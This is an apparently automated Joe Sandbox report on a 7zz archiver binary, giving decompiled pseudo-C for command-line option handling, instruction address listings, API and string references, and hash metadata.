															_t573 =  *((intOrPtr*)( *( *(_t791 + 0x1c)) + 0x34))(_t791 - 0x30);
															__eflags = _t573;
															 *(_t791 + 0x24) = _t573;
															if(_t573 != 0) {
																E00407A18( *((intOrPtr*)(_t791 - 0x30)));
																 *(_t791 - 4) = 5;
																E00408604(_t791 - 0x48);
																 *(_t791 - 4) = 4;
																E00403411(_t791 - 0xd4);
																E00407A18( *((intOrPtr*)(_t791 - 0x70)));
																__eflags = _t786;
																 *(_t791 - 4) = 0;
																if(_t786 != 0) {
																	 *((intOrPtr*)( *_t786 + 8))(_t786);
																}
																_t790 =  *(_t791 + 0x24);
																goto L110;
															} else {
																goto L64;
															}
														}
													}
												} else {
													 *(_t791 - 0x18) =  *(_t791 - 0x18) +  *((intOrPtr*)(_t791 - 0xac));
													_t581 =  *(_t791 + 0x1c);
													asm("adc [ebp-0x14], ecx");
													_t582 =  *((intOrPtr*)( *_t581 + 0xc))(_t581,  *(_t791 - 0x18),  *(_t791 - 0x14));
													__eflags = _t582;
													 *(_t791 + 0x24) = _t582;
													if(_t582 != 0) {
														 *(_t791 - 4) = 5;
														E00408604(_t791 - 0x48);
														 *(_t791 - 4) = 4;
														E00403411(_t791 - 0xd4);
														E00407A18( *((intOrPtr*)(_t791 - 0x70)));
														__eflags = _t786;
														 *(_t791 - 4) = 0;
														if(_t786 != 0) {
															 *((intOrPtr*)( *_t786 + 8))(_t786);
														}
														_t790 =  *(_t791 + 0x24);
														L110:
														 *(_t791 - 4) =  *(_t791 - 4) | 0xffffffff;
														E00408604(_t791 - 0xe8);
														_t468 = _t790;
														goto L82;
													} else {
														goto L61;
													}
												}
											}
										}
									}
								}
							}
							goto L116;
							L78:
							 *(_t791 - 4) = 5;
							E00408604(_t791 - 0x48);
							 *(_t791 - 4) = 4;
							E00403411(_t791 - 0xd4);
							 *(_t791 - 4) = 3;
							E00407A18( *((intOrPtr*)(_t791 - 0x70)));
							 *(_t791 - 0x20) =  *(_t791 - 0x20) + 1;
							__eflags =  *(_t791 - 0x20) -  *(_t791 - 0x24);
						} while ( *(_t791 - 0x20) <  *(_t791 - 0x24));
						goto L79;
					}
				} else {
					_t631 =  *(_t791 + 0x1c);
					_t632 =  *((intOrPtr*)( *_t631 + 0xc))(_t631,  *(_t791 - 0x18),  *(_t791 - 0x14));
					 *(_t791 + 0x24) = _t632;
					if(_t632 == 0) {
						goto L20;
					} else {
						 *(_t791 - 4) = 0;
						if(_t786 != 0) {
							 *((intOrPtr*)( *_t786 + 8))(_t786);
						}
						 *(_t791 - 4) =  *(_t791 - 4) | 0xffffffff;
						E00408604(_t791 - 0xe8);
						_t468 =  *(_t791 + 0x24);
						L82:
						 *[fs:0x0] =  *((intOrPtr*)(_t791 - 0xc));
						return _t468;
					}
				}
				L116:
			}

0x00415d31
0x00415d36
0x00415d44
0x00415d47
0x00415d4c
0x00415d4f
0x00415d52
0x00415d55
0x00415d58
0x00415d5b
0x00415d65
0x00415d68
0x00415d6b
0x00415d6e
0x00415d71
0x00415d74
0x00415d77
0x00415d7a
0x00415d7d
0x00415d82
0x00415d8f
0x00415d94
0x00415d9e
0x00415d96
0x00415d98
0x00415d98
0x00415da1
0x00415da5
0x00415da8
0x00415e28
0x00415e28
0x00415e2d
0x00415e33
0x00415e35
0x00415e3a
0x00415e3e
0x00000000
0x00415e40
0x00415e40
0x00415e45
0x00415e45
0x00415daa
0x00415daa
0x00415dad
0x00415db5
0x00415db9
0x00415dbf
0x00415dc5
0x00415dc7
0x00000000
0x00415dc9
0x00415dd8
0x00415de1
0x00415e52
0x00415e59
0x00415e5e
0x00415e67
0x00415e6e
0x00415e73
0x00415e73
0x00415e73
0x00415de3
0x00415deb
0x00000000
0x00000000
0x00000000
0x00000000
0x00415deb
0x00415de1
0x00000000
0x00415ded
0x00415dff
0x00415e10
0x00415e16
0x00415e19
0x00415e1c
0x00415e21
0x00415e23
0x00000000
0x00415daa
0x00415e75
0x00415e77
0x00415e7a
0x00415e80
0x00415e85
0x00415e85
0x00415e8c
0x00415e8f
0x00415e99
0x00415e9c
0x00415ea2
0x00415ea8
0x00415eb0
0x00415eb6
0x00415eb9
0x00415ebc
0x00415ec2
0x00415ec8
0x00415ece
0x00415ed4
0x00415f10
0x00415f10
0x00415f13
0x00415f16
0x004163df
0x004163e5
0x004163e7
0x004163f0
0x004163f9
0x00416402
0x0041640b
0x00416414
0x0041641d
0x00416423
0x00416429
0x0041642a
0x0041642c
0x0041642f
0x00416438
0x0041643e
0x00416441
0x00416446
0x00416446
0x00416449
0x00416453
0x00416458
0x00416458
0x00000000
0x00415f1c
0x00415f1c
0x00415f2b
0x00415f2e
0x00415f36
0x00415f3a
0x00415f3c
0x00415f52
0x00415f58
0x00415f5a
0x00415f5f
0x00415f61
0x0041668a
0x00416693
0x0041669a
0x004166a4
0x004166a9
0x004166aa
0x004166ab
0x004166ac
0x004166ad
0x004166b1
0x004166b2
0x004166b5
0x004166bb
0x004166c2
0x004166c9
0x004166cc
0x004166cf
0x004166d2
0x004166d5
0x004166d8
0x004166dd
0x004166e1
0x004166e3
0x004166e6
0x004166e9
0x004166ee
0x004166f3
0x004166f7
0x004166f9
0x004166fc
0x004166ff
0x00416704
0x00416709
0x0041670d
0x0041670f
0x00416712
0x00416715
0x0041671a
0x0041671e
0x00416722
0x00416726
0x0041672c
0x00416732
0x00416738
0x0041673b
0x0041673e
0x00416741
0x00416748
0x0041674e
0x00416754
0x0041675a
0x0041675c
0x0041675e
0x00416762
0x00416768
0x0041676f
0x00416776
0x0041677c
0x0041677f
0x00416781
0x00416785
0x00416790
0x00416790
0x00416787
0x00416789
0x00416789
0x00416795
0x00416799
0x0041679f
0x004167ac
0x004167b4
0x00415f67
0x00415f6a
0x00415f6d
0x00415f6f
0x00000000
0x00000000
0x00000000
0x00000000
0x00415f6f
0x00415f3e
0x00415f3e
0x00415f44
0x00415f4a
0x00415f75
0x00415f7a
0x00415f88
0x00415f8b
0x00415f8d
0x00415f90
0x0041646e
0x00416473
0x00416476
0x00416479
0x0041647e
0x0041647e
0x00416481
0x00000000
0x00415f96
0x00415f9c
0x00415fa6
0x00415faa
0x00415fb2
0x00415fb6
0x00415fbd
0x00415fc5
0x00415fc8
0x00415fcd
0x00415fd0
0x00415fd4
0x00415fd7
0x00415fdd
0x00415fe0
0x00415fe3
0x00415fe5
0x00415feb
0x00415fed
0x00415ff1
0x00415ff1
0x00415ff5
0x00000000
0x00000000
0x00415ff7
0x00415ff9
0x00416008
0x00416008
0x00416008
0x00415ffb
0x00415ffc
0x00000000
0x00415ffc
0x0041600c
0x0041600c
0x0041600f
0x00416021
0x0041602d
0x00416031
0x00416036
0x00416038
0x0041603b
0x00416049
0x0041604e
0x00416050
0x00416063
0x0041606c
0x00416070
0x00416075
0x0041607f
0x00416084
0x00416088
0x0041608a
0x0041608c
0x0041608f
0x00416093
0x00416093
0x00416097
0x00000000
0x00000000
0x00416099
0x0041609b
0x004160a7
0x004160a7
0x0041609d
0x0041609e
0x00000000
0x0041609e
0x004160aa
0x004160aa
0x004160ac
0x004160ba
0x004160c3
0x004160cc
0x004160cf
0x004160d9
0x004160de
0x004160e2
0x004160ec
0x004160f1
0x004160f3
0x004160fb
0x00416106
0x00416106
0x004160f3
0x004160e2
0x00000000
0x004160ac
0x004160a3
0x00000000
0x004160a3
0x0041608a
0x00416050
0x0041610b
0x0041610e
0x00416112
0x00416117
0x00000000
0x0041600f
0x00416003
0x00000000
0x00416003
0x00415fe5
0x00416118
0x00416118
0x00416124
0x00416129
0x0041612a
0x0041612e
0x0041612f
0x00416132
0x00416137
0x0041613c
0x0041613f
0x0041648c
0x00416490
0x0041649b
0x0041649f
0x004164a7
0x004164ac
0x004164af
0x004164b2
0x004164b7
0x004164b7
0x004164ba
0x00000000
0x00416145
0x00416150
0x0041615f
0x00416167
0x0041616a
0x0041616c
0x0041616f
0x004164c7
0x004164cb
0x004164d6
0x004164da
0x004164e2
0x004164e7
0x004164ea
0x004164ed
0x004164f2
0x004164f2
0x004164f5
0x00000000
0x00416175
0x00416175
0x00416178
0x00000000
0x0041617e
0x00416181
0x00416183
0x00416213
0x00416213
0x00416189
0x00416189
0x0041618f
0x00416192
0x00416198
0x004161a7
0x004161ac
0x004161ae
0x004161b1
0x004161b6
0x004161b9
0x004161c5
0x004161d2
0x004161e3
0x004161e3
0x004161e3
0x004161f4
0x004161f7
0x00416202
0x00416202
0x004161b9
0x00416205
0x0041620b
0x0041620b
0x00000000
0x00416198
0x00416192
0x00416219
0x00416247
0x0041624c
0x0041624f
0x00416252
0x00416255
0x00416261
0x00416267
0x0041626a
0x0041626c
0x0041626f
0x00416539
0x0041653f
0x00416546
0x00416551
0x00416555
0x0041655d
0x00416562
0x00416565
0x00416568
0x0041656d
0x0041656d
0x00416570
0x00000000
0x00416275
0x00416275
0x00416278
0x00416291
0x00416291
0x00416297
0x0041629a
0x0041629c
0x004162d5
0x004162db
0x004162e2
0x004162e5
0x004162e7
0x004162f3
0x004162f3
0x004162e9
0x004162e9
0x004162ec
0x00000000
0x004162ee
0x004162ee
0x004162f0
0x004162f0
0x004162ec
0x004162f5
0x004162fb
0x00416301
0x00416320
0x00416332
0x00416337
0x00416339
0x0041633c
0x004165fc
0x00416602
0x00416609
0x00416614
0x00416618
0x00416620
0x00416625
0x00416628
0x0041662b
0x00416630
0x00416630
0x00416633
0x00000000
0x00416342
0x00416345
0x00416347
0x00416369
0x0041636c
0x00416349
0x0041634f
0x00416355
0x0041635b
0x00416361
0x00416364
0x00416364
0x00416375
0x00416378
0x0041637b
0x00416387
0x00416390
0x00416393
0x00416396
0x00416399
0x0041639c
0x00416638
0x0041663e
0x00416645
0x00416650
0x00416654
0x0041665c
0x00416661
0x00416664
0x00416667
0x0041666c
0x0041666c
0x0041666f
0x00000000
0x004163a2
0x004163a2
0x00000000
0x004163a7
0x0041639c
0x0041629e
0x0041629e
0x004162a7
0x004162aa
0x004162ad
0x00000000
0x004162af
0x004162af
0x004162b9
0x004162bc
0x004162be
0x004162c1
0x004165bd
0x004165c3
0x004165ca
0x004165d5
0x004165d9
0x004165e1
0x004165e6
0x004165e9
0x004165ec
0x004165f1
0x004165f1
0x004165f4
0x00000000
0x00000000
0x00000000
0x00000000
0x004162c1
0x00000000
0x004162c7
0x004162c7
0x004162cd
0x004162d0
0x004162d0
0x00000000
0x0041629e
0x0041627a
0x00416283
0x00416286
0x00416288
0x0041628b
0x0041657b
0x00416581
0x00416588
0x00416593
0x00416597
0x0041659f
0x004165a4
0x004165a7
0x004165aa
0x004165af
0x004165af
0x004165b2
0x00000000
0x00000000
0x00000000
0x00000000
0x0041628b
0x00416278
0x0041621b
0x00416227
0x0041622a
0x0041622d
0x00416239
0x0041623c
0x0041623e
0x00416241
0x00416500
0x00416504
0x0041650f
0x00416513
0x0041651b
0x00416520
0x00416523
0x00416526
0x0041652b
0x0041652b
0x0041652e
0x00416674
0x00416674
0x0041667e
0x00416683
0x00000000
0x00000000
0x00000000
0x00000000
0x00416241
0x00416219
0x00416178
0x0041616f
0x0041613f
0x00415f90
0x00000000
0x004163a8
0x004163ab
0x004163af
0x004163ba
0x004163be
0x004163c3
0x004163ca
0x004163cf
0x004163d6
0x004163d6
0x00000000
0x00415f1c
0x00415ed6
0x00415ed9
0x00415ee2
0x00415ee7
0x00415eea
0x00000000
0x00415eec
0x00415eee
0x00415ef1
0x00415ef6
0x00415ef6
0x00415ef9
0x00415f03
0x00415f08
0x0041645a
0x00416460
0x00416468
0x00416468
0x00415eea
0x00000000

APIs

__EH_prolog.LIBCMT ref: 00415D36

Part of subcall function 0046B8F4: RaiseException.KERNEL32(0047CF70,?,00405CA1,?,?,?,0047CF70,?,?,?,00405CA1), ref: 0046B922

Part of subcall function 00403411: __EH_prolog.LIBCMT ref: 00403416

Strings

rar, xrefs: 004160E7
001, xrefs: 00416044

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: H_prolog$ExceptionRaise
String ID: 001$rar
API String ID: 2062786585-402399766
Opcode ID: 6222c04c949ac495ab94f66733b2a8b9047b5a3fd200594ee6b5b932aa16b14e
Instruction ID: 33800bdb08af1194ea128a8acb6c6cdf99de6f84a10513a4969611219b06b6dc
Opcode Fuzzy Hash: 6222c04c949ac495ab94f66733b2a8b9047b5a3fd200594ee6b5b932aa16b14e
Instruction Fuzzy Hash: B5623A70901259DFCB14DFA9C980ADDBBB1BF08308F1545AEE849B7291CB34AE85CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0041035D Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 546
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E0041035D(void* __ecx) {
				void* __ebx;
				void* __edi;
				intOrPtr _t192;
				char* _t200;
				intOrPtr _t201;
				intOrPtr _t202;
				signed char _t206;
				char _t212;
				signed char _t216;
				char _t217;
				void* _t218;
				void* _t220;
				intOrPtr* _t225;
				void* _t228;
				void* _t230;
				signed char _t233;
				signed char _t234;
				signed int _t235;
				signed char _t243;
				char* _t247;
				signed int _t248;
				signed int _t249;
				char _t251;
				char* _t252;
				signed char _t253;
				char* _t258;
				signed char _t268;
				char* _t269;
				char* _t291;
				char _t319;
				void* _t331;
				intOrPtr _t357;
				signed int _t363;
				void* _t364;
				signed int _t365;
				char _t375;
				void* _t421;
				void* _t422;
				signed int _t441;
				signed int _t443;
				char* _t444;
				char* _t447;
				void* _t449;

				E0046B890(E00474174, _t449);
				_t331 = __ecx;
				_t192 =  *((intOrPtr*)(__ecx + 0x10));
				_t454 = _t192 - 1;
				 *((intOrPtr*)(_t449 - 0x24)) = _t192;
				if(_t192 < 1) {
					L0040FFF2();
				}
				_t447 =  *(_t449 + 8);
				if(E00410A4C( *((intOrPtr*)( *((intOrPtr*)(_t331 + 0x14)))),  &(_t447[0x20]), _t454) == 0) {
					L0040FFF2();
				}
				_t447[0x40] =  *((intOrPtr*)(E004071F7(_t331, 0x1c)));
				_t447[0x41] =  *((intOrPtr*)(E004071F7(_t331, 0x1f)));
				if( *(E004071F7(_t331, 0x1e)) != 0) {
					 *0x490adc = E004071F7(_t331, 0x1e) & 0xffffff00 |  *((intOrPtr*)(_t326 + 0x18)) < 0x00000000;
				}
				_t200 = E004071F7(_t331, 0x12);
				_t459 =  *_t200;
				if( *_t200 == 0) {
					 *(_t449 - 0x18) = 2;
				} else {
					 *(_t449 - 0x18) = E00410A39( *((intOrPtr*)(E004071F7(_t331, 0x12) + 0x18)));
				}
				_push(0xffffffff);
				_t421 = 0x1b;
				_t201 = E0041191E(_t331, _t421, _t459);
				_push(0xfde9);
				_t422 = 0x1a;
				 *0x48b6f8 = _t201;
				_t202 = E0041191E(_t331, _t422, _t459);
				 *(_t449 - 0x20) =  *(_t449 - 0x20) & 0x00000000;
				 *((intOrPtr*)(_t449 - 0x14)) = _t202;
				if( *((char*)(E004071F7(_t331, 0xb))) != 0) {
					_push( *((intOrPtr*)(_t449 - 0x14)));
					 *(_t449 - 0x20) = 1;
					_push( *(_t449 - 0x18));
					_push(1);
					E00410CA4( &(_t447[0xc]), E004071F7(_t331, 0xb) + 4);
				}
				if( *((char*)(E004071F7(_t331, 0xc))) != 0) {
					_push( *((intOrPtr*)(_t449 - 0x14)));
					_push( *(_t449 - 0x18));
					_push(0);
					E00410CA4( &(_t447[0xc]), E004071F7(_t331, 0xc) + 4);
				}
				_t441 = 1;
				if( *((char*)(E004071F7(_t331, 0xf))) != 0) {
					L17:
					_t26 = _t449 + 0xb;
					 *_t26 =  *(_t449 + 0xb) & 0x00000000;
					__eflags =  *_t26;
					L18:
					_t206 = E0040FE22( &(_t447[0x20]));
					 *(_t449 - 0xe) = _t206;
					if(_t206 != 0 || _t447[0x20] == 6) {
						__eflags = _t447[5];
						 *(_t449 - 0xd) = 1;
						if(_t447[5] != 0) {
							_t35 = _t449 + 0xb;
							 *_t35 =  *(_t449 + 0xb) & 0x00000000;
							__eflags =  *_t35;
						}
					} else {
						 *(_t449 - 0xd) =  *(_t449 - 0xd) & _t206;
					}
					if( *(_t449 + 0xb) != 0) {
						if( *((intOrPtr*)(_t449 - 0x24)) <= 1) {
							L0040FFF2();
						}
						_t441 = 2;
						E00401E26( &(_t447[0x24]),  *((intOrPtr*)( *((intOrPtr*)(_t331 + 0x14)) + 4)));
						if(_t447[0x28] == 0) {
							L0040FFF2();
						}
					}
					_push( *((intOrPtr*)(_t449 - 0x14)));
					_push( *(_t449 - 0x20));
					 *(_t449 - 0x1c) =  &(_t447[0xc]);
					_push( *(_t449 - 0x18));
					_push(_t331 + 8);
					E00410B06(_t441,  &(_t447[0xc]));
					_t447[8] =  *((intOrPtr*)(E004071F7(_t331, 6)));
					_t212 =  *((intOrPtr*)(E004071F7(_t331, 7)));
					_t447[0x30] = _t212;
					if(_t212 != 0) {
						E00401E26( &(_t447[0x34]),  *((intOrPtr*)( *((intOrPtr*)(E004071F7(_t331, 7) + 0x10)))));
					}
					_t447[9] =  *((intOrPtr*)(E004071F7(_t331, 0x18)));
					if( *((char*)(E004071F7(_t331, 5))) != 0) {
						E00401E26( &(_t447[0x168]),  *((intOrPtr*)( *((intOrPtr*)(E004071F7(_t331, 5) + 0x10)))));
					}
					if( *(_t449 - 0xd) == 0) {
						_t216 = E0040FE46( &(_t447[0x20]));
						__eflags = _t216;
						if(_t216 == 0) {
							_t217 = _t447[0x20];
							__eflags = _t217 - 7;
							if(_t217 != 7) {
								__eflags = _t217 - 8;
								if(_t217 != 8) {
									L0040FFF2();
								}
								goto L110;
							}
							_t447[0x17c] = _t447[0x17c] | 0xffffffff;
							_t447[0x180] = _t447[0x180] | 0xffffffff;
							__eflags = _t441 -  *((intOrPtr*)(_t449 - 0x24));
							_t424 =  &(_t447[0x178]);
							_t447[0x178] = 1;
							if(_t441 <  *((intOrPtr*)(_t449 - 0x24))) {
								_t243 = E004119B8( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t331 + 0x14)) + _t441 * 4)))), _t424);
								__eflags = _t243;
								if(_t243 == 0) {
									L0040FFF2();
								}
							}
							_t443 = 0;
							_t220 = E004071F7(_t331, 8);
							__eflags =  *(_t220 + 0xc);
							if( *(_t220 + 0xc) > 0) {
								do {
									E004039C0(_t449 - 0x30,  *((intOrPtr*)( *((intOrPtr*)(E004071F7(_t331, 8) + 0x10)) + _t443 * 4)));
									 *(_t449 - 4) = 3;
									E00407ED0( *((intOrPtr*)(_t449 - 0x30)));
									__eflags =  *((intOrPtr*)(_t449 - 0x2c)) - 2;
									if( *((intOrPtr*)(_t449 - 0x2c)) < 2) {
										L0040FFF2();
									}
									_t225 =  *((intOrPtr*)(_t449 - 0x30));
									_t357 =  *_t225;
									__eflags = _t357 - 0x44;
									if(_t357 != 0x44) {
										__eflags = _t357 - 0x4d;
										if(_t357 != 0x4d) {
											L100:
											L0040FFF2();
											goto L101;
										}
										__eflags =  *((short*)(_t225 + 2)) - 0x54;
										if( *((short*)(_t225 + 2)) != 0x54) {
											__eflags = _t357 - 0x4d;
											if(_t357 != 0x4d) {
												goto L100;
											}
											__eflags =  *((short*)(_t225 + 2)) - 0x3d;
											if( *((short*)(_t225 + 2)) != 0x3d) {
												goto L100;
											}
											__eflags =  *((short*)(_t225 + 4));
											if( *((short*)(_t225 + 4)) == 0) {
												goto L102;
											}
											_t230 = E004072C9(_t449 - 0x30, _t449 - 0x3c, 2);
											 *(_t449 - 4) = 4;
											E00401E26( &(_t447[0x184]), _t230);
											E00407A18( *((intOrPtr*)(_t449 - 0x3c)));
											goto L101;
										}
										__eflags =  *((short*)(_t225 + 4)) - 0x3d;
										_t363 = 2;
										if( *((short*)(_t225 + 4)) == 0x3d) {
											_t363 = 3;
										}
										__eflags =  *((short*)(_t225 + _t363 * 2));
										_t364 = _t225 + _t363 * 2;
										if( *((short*)(_t225 + _t363 * 2)) == 0) {
											goto L102;
										} else {
											_t233 = E004119B8(_t364,  &(_t447[0x17c]));
											__eflags = _t233;
											if(_t233 != 0) {
												goto L101;
											}
											goto L100;
										}
									} else {
										__eflags =  *((short*)(_t225 + 2)) - 0x3d;
										_t365 = 1;
										if( *((short*)(_t225 + 2)) == 0x3d) {
											_t365 = 2;
										}
										_t234 = E004119B8(_t225 + _t365 * 2, _t449 + 8);
										__eflags = _t234;
										if(_t234 == 0) {
											L0040FFF2();
										}
										__eflags =  *(_t449 + 8) - 0x1f;
										if( *(_t449 + 8) > 0x1f) {
											L0040FFF2();
										}
										_t235 = 1;
										_t447[0x180] = _t235 <<  *(_t449 + 8);
										L101:
										_t225 =  *((intOrPtr*)(_t449 - 0x30));
									}
									L102:
									 *(_t449 - 4) =  *(_t449 - 4) | 0xffffffff;
									E00407A18(_t225);
									_t443 = _t443 + 1;
									_t228 = E004071F7(_t331, 8);
									__eflags = _t443 -  *((intOrPtr*)(_t228 + 0xc));
								} while (_t443 <  *((intOrPtr*)(_t228 + 0xc)));
							}
							goto L110;
						}
						_t444 =  &(_t447[0x90]);
						_push(_t444);
						E0041124B(_t447[0x20], _t331);
						E004117BD(_t331,  &(_t444[4]), __eflags);
						_t247 = E004071F7(_t331, 0x1d);
						__eflags =  *_t247;
						if( *_t247 != 0) {
							_t444[0x98] = 1;
						}
						_t248 = E004071F7(_t331, 4);
						__eflags =  *_t248;
						_t249 = _t248 & 0xffffff00 |  *_t248 == 0x00000000;
						__eflags = _t249;
						_t447[0x174] = _t249;
						if(_t249 == 0) {
							L66:
							_t251 =  *((intOrPtr*)(E004071F7(_t331, 0x17)));
							__eflags = _t251;
							_t444[0xa9] = _t251;
							if(_t251 != 0) {
								E00401E26( &(_t444[0xac]),  *((intOrPtr*)( *((intOrPtr*)(E004071F7(_t331, 0x17) + 0x10)))));
								__eflags = _t444[0xb0];
								if(_t444[0xb0] > 0) {
									__eflags =  *(_t444[0xac]) - 0x2e;
									if( *(_t444[0xac]) == 0x2e) {
										_t444[0xaa] = 1;
										E004075A5( &(_t444[0xac]), 0, 1);
									}
								}
							}
							_t252 =  &(_t444[0xa8]);
							 *_t252 = _t447[6];
							_t253 =  *_t252;
							_t375 = _t447[5];
							__eflags = _t253;
							_t444[0x99] = _t375;
							if(_t253 != 0) {
								__eflags = _t444[0xa9];
								if(_t444[0xa9] != 0) {
									 *(_t449 + 8) = "stdout mode and email mode cannot be combined";
									_t253 = E0046B8F4(_t449 + 8, 0x47cf70);
								}
								__eflags = _t253;
								if(_t253 != 0) {
									__eflags = _t447[3];
									if(_t447[3] != 0) {
										_t258 =  *0x48ba30; // 0x48bab0
										 *(_t449 + 8) = _t258;
										E0046B8F4(_t449 + 8, 0x47d358);
									}
								}
							}
							__eflags = _t375;
							if(_t375 != 0) {
								E00401E26( &(_t444[0x9c]),  *((intOrPtr*)( *((intOrPtr*)(E004071F7(_t331, 0x14) + 0x10)))));
							}
							E00411046( *(_t449 - 0x1c));
							goto L110;
						} else {
							_t268 = _t447[6];
							__eflags = _t268;
							if(_t268 == 0) {
								L64:
								__eflags = _t447[3];
								if(_t447[3] != 0) {
									goto L66;
								}
								L65:
								_t122 =  &(_t447[0x174]);
								 *_t122 = _t447[0x174] & 0x00000000;
								__eflags =  *_t122;
								goto L66;
							}
							__eflags = _t447[4];
							if(_t447[4] == 0) {
								goto L65;
							}
							__eflags = _t268;
							if(_t268 != 0) {
								goto L66;
							}
							goto L64;
						}
					} else {
						_t269 =  *(_t449 - 0x1c);
						if(_t269[8] != 1 ||  *((intOrPtr*)( *(_t269[0xc]) + 4)) != 0) {
							L0040FFFD("Cannot use absolute pathnames for this command");
						}
						E00405B9F(_t449 - 0x50);
						 *((intOrPtr*)(_t449 - 0x50)) = 0x47a680;
						 *(_t449 - 4) =  *(_t449 - 4) & 0x00000000;
						if( *((char*)(E004071F7(_t331, 0xd))) != 0) {
							_push( *((intOrPtr*)(_t449 - 0x14)));
							_push(2);
							_push(1);
							E00410CA4(_t449 - 0x50, E004071F7(_t331, 0xd) + 4);
						}
						if( *((char*)(E004071F7(_t331, 0xe))) != 0) {
							_push( *((intOrPtr*)(_t449 - 0x14)));
							_push(2);
							_push(0);
							E00410CA4(_t449 - 0x50, E004071F7(_t331, 0xe) + 4);
						}
						if( *(_t449 + 0xb) != 0) {
							E00410AC9(_t449 - 0x50,  &(_t447[0x24]), 1, 2);
						}
						E00411046(_t449 - 0x50);
						E0040925B(_t449 - 0x50);
						if(_t447[5] == 0) {
							_push( &(_t447[0x68]));
							E0041003E(_t331, _t449 - 0x50,  &(_t447[0x54]), _t441, __eflags); // executed
						} else {
							E004039C0(_t449 - 0x30,  *((intOrPtr*)( *((intOrPtr*)(E004071F7(_t331, 0x14) + 0x10)))));
							_push(_t449 - 0x30);
							 *(_t449 - 4) = 1;
							E00406796( &(_t447[0x54]));
							_push(_t449 - 0x30);
							E00406796( &(_t447[0x68]));
							 *(_t449 - 4) =  *(_t449 - 4) & 0x00000000;
							E00407A18( *((intOrPtr*)(_t449 - 0x30)));
						}
						_t483 =  *(_t449 - 0xe);
						if( *(_t449 - 0xe) != 0) {
							E004117BD(_t331,  &(_t447[0x7c]), _t483);
							if(_t447[6] != 0 && _t447[3] != 0 && _t447[4] != 0) {
								_t291 =  *0x48ba34; // 0x48ba74
								 *(_t449 + 8) = _t291;
								E0046B8F4(_t449 + 8, 0x47d358);
							}
							if( *((char*)(E004071F7(_t331, 9))) != 0) {
								E00401E26( &(_t447[0x44]),  *((intOrPtr*)( *((intOrPtr*)(E004071F7(_t331, 9) + 0x10)))));
								L0040BEB9( &(_t447[0x44]));
							}
							_t447[0x50] = _t447[0x50] & 0x00000000;
							if( *((char*)(E004071F7(_t331, 0x16))) == 0) {
								__eflags = _t447[8];
								if(_t447[8] != 0) {
									_t447[0x50] = 1;
								}
							} else {
								_t447[0x50] =  *(0x48b704 +  *(E004071F7(_t331, 0x16) + 0x18) * 4);
							}
						}
						 *((intOrPtr*)(_t449 - 0x50)) = 0x47a680;
						 *(_t449 - 4) = 2;
						E0040862D();
						 *(_t449 - 4) =  *(_t449 - 4) | 0xffffffff;
						E00408604(_t449 - 0x50);
						L110:
						_t218 = E0040925B( *(_t449 - 0x1c));
						 *[fs:0x0] =  *((intOrPtr*)(_t449 - 0xc));
						return _t218;
					}
				}
				_t319 = _t447[0x20];
				if(_t319 == 7 || _t319 == 8) {
					goto L17;
				} else {
					 *(_t449 + 0xb) = 1;
					goto L18;
				}
			}

0x00410362
0x0041036b
0x0041036f
0x00410372
0x00410375
0x00410378
0x0041037a
0x0041037a
0x00410382
0x00410391
0x00410393
0x00410393
0x004103a7
0x004103b5
0x004103c0
0x004103d2
0x004103d2
0x004103db
0x004103e0
0x004103e3
0x004103fb
0x004103e5
0x004103f6
0x004103f6
0x00410402
0x00410406
0x00410409
0x0041040e
0x00410415
0x00410418
0x0041041d
0x00410422
0x0041042a
0x00410435
0x00410437
0x0041043c
0x00410440
0x00410443
0x00410454
0x00410454
0x00410465
0x00410467
0x0041046c
0x0041046f
0x00410480
0x00410480
0x00410489
0x00410494
0x004104a9
0x004104a9
0x004104a9
0x004104a9
0x004104ad
0x004104b0
0x004104b7
0x004104ba
0x004104c7
0x004104cb
0x004104cf
0x004104d1
0x004104d1
0x004104d1
0x004104d1
0x004104c2
0x004104c2
0x004104c2
0x004104d9
0x004104df
0x004104e1
0x004104e1
0x004104eb
0x004104f2
0x004104fb
0x004104fd
0x004104fd
0x004104fb
0x00410502
0x0041050d
0x00410510
0x00410513
0x00410516
0x00410517
0x0041052b
0x00410533
0x00410537
0x0041053a
0x0041054d
0x0041054d
0x00410561
0x0041056c
0x00410582
0x00410582
0x0041058b
0x0041075e
0x00410763
0x00410765
0x004108ae
0x004108b1
0x004108b4
0x00410a16
0x00410a19
0x00410a1b
0x00410a1b
0x00000000
0x00410a19
0x004108ba
0x004108c1
0x004108c8
0x004108cb
0x004108d1
0x004108d7
0x004108e3
0x004108e8
0x004108ea
0x004108ec
0x004108ec
0x004108ea
0x004108f5
0x004108f7
0x004108fc
0x004108ff
0x00410905
0x00410917
0x0041091f
0x00410926
0x0041092b
0x0041092f
0x00410931
0x00410931
0x00410936
0x00410939
0x0041093c
0x00410940
0x0041097e
0x00410982
0x004109b1
0x004109b1
0x00000000
0x004109b1
0x00410984
0x00410989
0x004109d9
0x004109dd
0x00000000
0x00000000
0x004109df
0x004109e4
0x00000000
0x00000000
0x004109e6
0x004109eb
0x00000000
0x00000000
0x004109f6
0x00410a02
0x00410a06
0x00410a0e
0x00000000
0x00410a13
0x0041098b
0x00410992
0x00410993
0x00410997
0x00410997
0x00410998
0x0041099d
0x004109a0
0x00000000
0x004109a2
0x004109a8
0x004109ad
0x004109af
0x00000000
0x00000000
0x00000000
0x004109af
0x00410942
0x00410942
0x00410949
0x0041094a
